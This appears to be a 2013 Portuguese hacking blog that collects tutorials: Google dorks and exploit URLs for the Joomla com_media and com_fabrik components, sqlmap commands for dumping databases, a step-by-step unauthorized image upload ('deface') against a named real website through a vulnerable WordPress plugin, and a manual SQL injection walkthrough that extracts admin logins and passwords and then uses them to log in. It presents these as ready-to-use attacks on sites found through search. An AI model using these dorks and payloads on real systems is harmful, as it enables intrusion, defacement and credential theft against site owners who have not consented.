quarta-feira, 17 de julho de 2013

Joomla Com_Media ~ Tutorial

Olá companheiros , bom iremos ensinar a vocês uma falha de "JOOMLA" .
Essa falha é uma falha muito boa de se praticar.
     
                                [ Joomla COM_MEDIA ]

 Joomla COM_MEDIA Exploit
   

           [ #Dorks ]

   Dork 1: inurl:index.php?option=com_media& site:com
   Dork 2: inurl:index2.php?option=com_media& site:net
   Dork 3: inurl:option=com_media


            [ #Exploit ]

    Exploit:  

 /index.phpoption=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=

                ( Tecnologia Pen/Test )

Explorando Contas Em CMSs

Sem exagero, é MUITO, MUITO, MUITO fácil explorar uma conta baseada nestes CMSs. O “trabalho” só não é mais fácil, porque a quantidade de sites existentes feitos em ambos, é muito grande e assim, os invasores não conseguem dar conta de todos. A seguir apenas um link – entre literalmente centenas – em que se pode encontrar um arsenal de ferramentas para explorar um site baseado em Joomla:
http://www.exploit-db.com/
Se você quer fazer parte do grupo daqueles que lutam para melhorar as aplicações, a tarefa não é das mais fáceis, já que ao que parece, os que trabalham para corrigir os problemas não conseguem fazer com que a informação chegue aos interessados de forma tão eficiente. Na verdade, a maior parcela de “culpa” está nas mãos dos usuários destas ferramentas, que deveriam interessar-se mais por repassá-la aos demais.
Veja que, uma pequena pesquisa também revela alguns links que podem ajudar a lidar com os problemas:

JOOMLA
http://www.joomlaclube.com.br/
http://eunaoqueroumblogue.blogspot.com.br/2013/03/checklist-de-seguranca-joomla.html
WORDPRESS
http://wp-brasil.org/
http://codex.wordpress.org/pt-br:Blindando_o_WordPress
Apesar da Origiweb adotar precedimentos de segurança nos servidores e atualizar constantemente regras de acesso, é de suma importância que o responsável por uma conta que faça uso do WordPress ou Joomla, assuma o seu papel na adoção de medidas corretivas e preventivas associadas à segurança da plataforma empregada. Por isso, é fundamental que se você tem um site baseado em alguma plataforma OpenSource, mantenha-se informado, atualize frequentemente seu site, pesquise sobre vulnerabilidades e tenha sempre backups frequentes do seu conteúdo em seu computador.

SQL Map no Kali Linux ~ Tutorial

Eae galera , hoje irei passar os comandos básicos para usar o Sql Map no Kali Linux ;

Vimos que os comandos não mudaram , apenas tiramos as aspas e escrevemos os comandos diretamente facilitando bastante o nosso trabalho .

Abra o Terminal e digite:

cd /usr/share/sqlmap

Os comandos :

sqlmap.py -u url --dbs

sqlmap.py. -u url -D --tables

sqlmap.py -u url -D -T --columns

sqlmap.py -u url -D -T --dump

____________________________________________________________________________________________

:: A url não precisa mais estar entre aspas ''

-D : bd
-T : tabelas
-C : colunas
-dump : pega toda a DB


~~ Obrigado por ver mais um tutorial nosso , agradeçemos sua visita ~~

Joomla com_fabrik Exploit

Nesse post vamos ver um pouco do joomla com_fabrik - Exploit :
   Dork 1: inurl:com_fabrik&view=form&
   Dork 2: inurl:index.php?option=com_fabrik

   Exploit: /index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher
   Ficando em: http://localhost:8080/media/arquivo.txt

Upload images ~ Tutorial

Olá estamos aqui para aprender um tutorial , que nos permite á dar um Upload em uma imagem
como se fosse um "deface" . vamos lá.

            
1ª : Vai no google e busca por esse código :

       Codigo:  plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1?

2ª : Depois vai aparecer vários sites mais nem todos são vulneraveis
     a essa invasão , então vamos fazer com esse site

         #SERVE:     http://www.thanksjon.ca/

3ª : Ou seja como irá ficar | http://www.thanksjon.ca/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=

4ª : Lá terá assim

        | Max File Size: 3 MB
         Allowable File Types: .jpg .gif
       |
Ou seja , você só poderá adicionar images em JPG Ou GIF (mais nem todos sites são esses dois)

5ª : você clica em | escolher arquivo , depois escolhe a imagem e clica em "upload before submitting!"

6ª : Se aparecer o nome dá imagem feita irá ser assim "FOTO.jpg (221 KB) Uploaded " , é porque a imagem foi , então como irá ficar?

7ª : http://www.thanksjon.ca/wp-content/uploads/tdomf/tmp/1/SEUIPAQUI/ONOMEDASUAIMAGEMAQUI.jpg

Depois é só checar se no site upo a imagem.

                        ( Tecnologia Pen/Test )



   

SQLInjection Manual ~ Tutorial

[Portuguese] SQL Injection

   _____  ____  _        _____       _           _   _
  / ____|/ __ \| |      |_   _|     (_)         | | (_)
 | (___ | |  | | |        | |  _ __  _  ___  ___| |_ _  ___  _ __
  \___ \| |  | | |        | | | '_ \| |/ _ \/ __| __| |/ _ \| '_ \
  ____) | |__| | |____   _| |_| | | | |  __/ (__| |_| | (_) | | | |
 |_____/ \___\_\______| |_____|_| |_| |\___|\___|\__|_|\___/|_| |_|
                                   _/ |
                                  |__/


Nessa aula estremos aprendendo SQLi, no entanto dessa vez estaremos consultado o database Mysql para obter informações de login e senha.

Aqui esta o site: www.site.com.br/noticias.php?id=10

Para descobrir se pode estar vulneravel, coloque ' depois do link, caso dei algum erro tem grande chance de estar vulneravel.

    www.site.com.br/noticias.php?id=10'



Um exemplo de erro: Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/site/public_html/noticias/index.php on line 282

Essa falha é baseada em erros.

Vamos pegar o numero de colunas usando ORDER BY *
É usado dessa maneira:

    +order+by+1 //Sem erro
    +order+by+2 //Sem erro
    +order+by+3 //Sem erro
    +order+by+4 //Sem erro
    +order+by+5 //Sem erro
    +order+by+6 //Erro



    www.site.com.br/noticias.php?id=10+order+by+5



Então são apenas 5 colunas

Vamos uni-las, usando UNION ALL SELECT *



    http://www.site.com.br/noticias.php?id=10+union+all+select+1,2,3,4,5



Coloque um traço (-) antes do valor da variavel ficando assim:

    http://www.site.com.br/noticias.php?id=-10+union+all+select+1,2,3,4,5



Irão aparecer numeros, eles que nóis iremos subtituir por informações:

Precisamos encontrar a tabela do login agora, podemos usar Brute Force, ou então information_schema. O information_schema só funciona em databases MYSQL acima de versão acima de 5.0, para descobrir a versão use: version()


    +union+all+select+1,version(),3



//--Brute Force--\\

Vamos tentar colocar tabelas até que não apareça erro:

    UNION ALL SELECT * FROM ADMIN == erro
    "" "" "" "" LOGIN == erro
    "" "" "" "" USER == erro
    "" "" "" "" USERS == erro
    "" "" "" "" USUARIOS == sem erro


Então no caso ficaria assim:

    http://www.site.com.br/noticias.php?id=-10+union+all+select+1,2,3,4,5+from+usuarios



Você pode usar: admin, admins, usuarios, usuario, user, users, user_name, username, login, adm, tb_usuarios, tb_admin ... entre outros.

//--INFORMATION_SCHEMA--\\

DATABASE: INFORMATION_SCHEMA
TABELA: TABLES
COLUNA: TABLE_NAME

Sintaxe = Exemplo: UNION ALL SELECT 1,TABLE_NAME,3 FROM INFORMATION_SCHEMA.TABLES

Para ir passando de tabela você usa LIMIT *

    LIMIT 1,1
    LIMIT 2,1
    LIMIT 3,1
    LIMIT 4,1
    LIMIT 5,1


... E assim vai indo até encontrar uma tabela de login.

Ex:

    http://www.site.com.br/noticias.php?id=-10+union+all+select+1,2,table_name,4,5+from+information_schema.tables+limit+1,1



//

Vamos agora descobrir as colunas de login, você pode usar as mesmas tecnicas de brute force e information_schema, no entanto information_schema é um pouco diferente:

DATABASE: INFORMATION_SCHEMA
TABELLA: COLUMNS
COLUNA: COLUMN_NAME

Sintaxe = Exemplo: UNION ALL SELECT 1,COLUMN_NAME,3 FROM INFORMATION_SCHEMA.COLUMNS

Para passar de coluna pode usar o LIMIT também.

//

Agora continuando suponhamos que eu tenha pegado a tabela USUARIOS e as colunas LOGIN e SENHA, para pegar as informações de login e senha é so digitar eles no seu site, nos numeros visiveis, suponhamos que tenha parecido o 2 e 3 então vamos substituir eles pela informação:


    UNION ALL SELECT 1,LOGIN,SENHA,3,4,5 FROM USUARIOS



    http://www.site.com.br/noticias.php?id=-10+union+all+select+1,login,senha,4,5+from+usuarios



Agora é só encontrar a area de login, geralmente fica em /admin , /adm/ , /administrator /login.php , ou você pode usar o acunetix ou algum outro tool para encontrar a area de login.
Ao encontra-la é só você se logar com as informações que você pegou

E pronto .



Divulgue-nos -> http://tech-pentest.blogspot.com.br/